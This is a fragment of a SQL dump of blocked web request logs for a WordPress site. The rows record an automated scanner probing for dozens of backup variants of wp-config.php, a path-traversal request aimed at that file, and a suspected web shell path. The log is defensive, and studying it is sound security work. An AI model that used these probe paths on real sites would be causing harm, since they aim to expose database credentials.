(Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','9ZElyxqs8dvoC5P10QhegiAV',0,1675015531.3802,100,'','GET',403,0,700,0,1,'',0),('193.42.33.150',3240763798,'','https://equalitywalk.org.uk/blog/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','GQCqKZ8DPSaMWY4u7RLhAb20',0,1675015605.9128,110,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/general.php?file=wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','frLFVRAhO3ayJkBGlqNU6MEW',0,1675016906.6672,112,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.swp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','z5Z6c3N9KGaWQjB1VbTMrmIO',0,1675016923.7538,140,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.swo','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','JxIaWRLpBi3bolFMfwchtY1k',0,1675016924.1163,103,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.save','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','sC9MzrG4PkovgaJ6dEwXLRSU',0,1675016924.2757,95,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.old','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','wBYErQF4RIZUH0cpOhg1GfkM',0,1675016924.4311,142,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.dist','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','UoG0Vu9B7HfJEsyOvwTiqRCd',0,1675016924.6472,148,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','VSl3yJOXdkcW2BLhMiPaebCm',0,1675016924.8475,107,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.backup','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','NKTaMCX6nGv4uAPW3FQDkf0O',0,1675016925.0100,104,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ixzaZEKV4PcA28yON1S9bMer',0,1675016925.4534,129,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/.wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','MdBNUFLE3epwlCyhnkHGPbuJ',0,1675016925.8380,90,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.inc','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','zAMbZefRL4W1wHOi5tcmu3T2',0,1675016926.8819,132,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','bmnEBr7RojJNkHi5hMeKQ0Uc',0,1675016927.0699,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.tar.bz2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','TskO8tndSfwDucJHeqv6R9Cp',0,1675016930.4985,111,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.copy','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','9jMPQgzXTr6kWKis0xFc53ao',0,1675016930.6708,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.tgz','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','IOzcDYgHswt5kiNpqVMabBCA',0,1675016930.8214,105,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.rar','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','i1IZ6NV9nq7FfvYsgpKtbBU8',0,1675016931.2286,108,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.7z','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','1fnchSw38UHgVMZFvPz4Bu6i',0,1675016931.3940,97,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.tmp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','86MtnE3LwG0oCsrypThH5lQv',0,1675016931.5422,103,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.0','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','M8CfXWIjwNHeF2QpLK4ms6Dc',0,1675016931.8448,91,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','bTFzi3nOGmWpa5ftgSeY4quP',0,1675016931.9929,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','8pOtsHbVZgzlEKqePvdQk6J7',0,1675016932.1348,129,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.zip','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','80GXKsjcwSyhxaP3zoLurJp2',0,1675016932.3196,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.gz','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','42j1CKoDbuXvOdQrZBLwRF5l',0,1675016932.4730,130,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','MRrgnxdBKU8syiphNGHIPocT',0,1675016935.4746,168,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.swp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','rYK3iDehRXfyblAJ9u5vPjCo',0,1675016935.7003,99,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','aD7Lfq5WtulCNSKFiGwJZMzO',0,1675016935.8567,123,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.tar.bz2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Aa6GoTdmvhzB5grMXZlULSeC',0,1675016936.0387,129,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.copy','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','JW6lF5UPAugCVapyRZhiDzK8',0,1675016936.2269,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.tgz','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','bfGiYJlj972udgMq5t3nOShI',0,1675016936.3786,95,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.rar','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','WBIojP2pJQGdcuR3VwMl4Eyf',0,1675016936.6683,100,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.7z','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','5ZdL0X9OTWtwUVBNE87RA3as',0,1675016936.8165,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.tmp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','3EmdNHsIfwr1KjGvtOVnaeUl',0,1675016936.9569,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.old','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','LsdJ0W6l5ZxCTzq4MHckfDN2',0,1675016937.2900,106,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.0','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','XbdVCPWy8056NuliYOhnZ4m2',0,1675016937.4537,116,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','8qKJ7fgHDbzeA2rGxOWBItQn',0,1675016937.6369,115,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','lDayuTGUPjHQheOsdE5mX0NJ',0,1675016937.7998,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.zip','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','PrsBbj6QeOWVhFw5tdTZ7pMN',0,1675016937.9491,112,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/~wp-config.php.gz','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','cK1SavsHd0kUIRxiqXjhA8ZJ',0,1675016938.1223,141,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','035A6HcDTa9Bnp2dSKLNhqvG',0,1675016941.3175,99,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.swp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','vnx5EkNOIXuzCKhisjt98Jal',0,1675016941.4818,94,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','wDoc5XfGVumO1xkK4rdjy6aC',0,1675016941.6334,122,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.tar.bz2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','BhDfQ5kLbjKcPYa6Fw2XpEAi',0,1675016941.8129,119,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.copy','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','YTErVbitL42U3XzgMAOveCQq',0,1675016941.9950,87,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.tgz','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','PrJUXwlOqK69G1DxIughMc5n',0,1675016942.1418,130,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.rar','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Gh6uOEl5JDbo3mtLXAxpVCWk',0,1675016942.4737,85,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.7z','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ofRK7OPjUNsGh3FkJZMvClX2',0,1675016942.6062,99,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.tmp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Cceoz39aVRUEiPbhTvrX7HIM',0,1675016942.7575,110,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.old','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','E1Dowe6PthJSVqc39l8dy2fv',0,1675016943.1146,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.0','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','yH4YGzevrW8xkj9DPXL7RVQZ',0,1675016943.2638,106,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ZEabzXjI0lUt1CrWxvOSVwnd',0,1675016943.4167,94,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','VhpajHAZ4EXfOTBYcqi8CJ0w',0,1675016943.5590,98,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.zip','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','n2rRiLUPb3jNSlmpcMt8uBqH',0,1675016943.7042,100,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/_wp-config.php.gz','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','bBIlU6GTniD1fJVaqxSyAgvW',0,1675016943.8516,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.templ','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','c9BJO3zmxI6f4nRsb5gtFSLX',0,1675016949.9527,118,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','0IFiB9XsexdNmWGUt6DYb7oy',0,1675016950.1261,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','RLz3Ukft87jCq9oDvWFV1EgS',0,1675016950.2822,85,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.orig','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','KBOzrXAphwHxLtukdV8lfsZy',0,1675016950.8450,128,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.original','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ndsbry6FVeRtLZ0HzqvEi9Y2',0,1675016951.0260,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-license.php?file=..%2F..%2F%2Fwp-config','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','kzZA6mGJi0lEaSYHjr4VLRbx',0,1675016951.1674,142,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config%20copy.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','piyEMqkVJCg8ozh6ArcaLedQ',0,1675016952.0407,136,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config-backup.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','vtQmFD7gCRZHA3yo1KLcaphV',0,1675016952.5589,91,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config-sample.php.bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','wT83WXv2rAi6JFBHgjzxPfMI',0,1675016952.9966,94,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.local.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','o9gQ0SELrP7Bcn6Obxw1TF8C',0,1675016954.0507,115,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','XAp3diC9weFGvBgWkLRmbxDq',0,1675016958.1447,91,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.4','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','m0n5GzyWNZioFbhM1lpOx9VQ',0,1675016958.2954,134,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.5','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','t4rGUIbyZnXAe7EOoTYNiSVz',0,1675016958.5076,130,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.6','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','T9UidxWevRDz1kZ2nbyaC5hG',0,1675016958.6860,133,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.7','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','oPelzB764WtynfxHZ9d08gUN',0,1675016958.8699,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.9','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','fsOAMyli6dSmBtWe09xC73Ug',0,1675016959.0144,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.a','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','J6cnwdp7aD0eKHi8h4loGAIx',0,1675016959.1559,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.aws','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','NdW4bCjIOxKz30fT9sHLoqew',0,1675016959.3111,142,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.azure','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','m4q607A3shiMED1vXcfSNjJP',0,1675016959.5016,99,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.b','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','9Buab7ACK0jiJrQYzvIwGPFt',0,1675016959.6495,94,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.backup.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ECIX9MLwt5uFjrbV6UZWHYQO',0,1675016959.7949,135,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.bk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','2A4DJ9n7Kmg1c0RsfC8qZewa',0,1675016959.9815,123,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.bkp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','C6pzdAgI4me15NTb0HsPFniG',0,1675016960.1637,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.com','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','K4ihWutETn205XQ3JoZOlC1m',0,1675016960.3083,95,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.cust','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','XKUFDYBTwyfgLIh3MGl1j4CQ',0,1675016960.4513,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.dev','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','vjohOw4lVBGFU2ZeDRcx15ty',0,1675016960.5947,131,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.dump','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','s7K6ynMxrhG5zkDeYC9TLIuf',0,1675016960.7820,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.in','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','nE5B30iFtGuUl6vkZysjmh4D',0,1675016960.9227,113,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.local','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','nfTchqY6rQ4BGA7VpkF28xog',0,1675016961.0909,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.maj','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','dYoDO8vgKutIwZ7GkEBszAUi',0,1675016961.2315,95,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.new','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','iH81xfTwWdDcoQha6PIqtSgL',0,1675016961.3824,125,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.org','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','CAQc1hBs6nu5XMyFad74J2Or',0,1675016961.5636,99,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.php-bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Z4tASKeX2ar69Uxp3RokqjV1',0,1675016961.7272,97,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.prod','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','QAhCxnZyGUVRT6bYBq5tLsvP',0,1675016961.8798,97,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.production','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 